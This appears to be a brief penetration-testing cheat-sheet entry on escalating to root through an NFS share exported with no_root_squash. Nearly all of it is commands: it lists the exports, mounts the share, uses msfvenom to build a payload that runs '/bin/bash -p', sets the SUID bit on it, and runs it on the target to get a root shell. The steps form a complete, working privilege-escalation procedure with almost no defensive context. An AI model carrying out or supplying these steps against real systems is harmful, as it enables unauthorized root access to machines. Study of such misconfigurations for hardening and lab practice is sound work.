NFS

cat /etc/exports
 
...  
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)

Local machine

$ showmount -e 192.168.1.25
Exports list on 192.168.1.25:
/tmp

Create a mount point on your local machine and mount the /tmp NFS share:

mkdir /tmp/nfs  
mount -o rw,vers=2 192.168.1.25:/tmp /tmp/nfs

Using the root user on your local machine, generate a payload and save it to the mounted share:

# msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
 

Make sure the file has the SUID bit set, and is executable by everyone:

chmod +xs /tmp/nfs/shell.elf

On the target machine, execute the file to get a root shell:

/tmp/shell.elf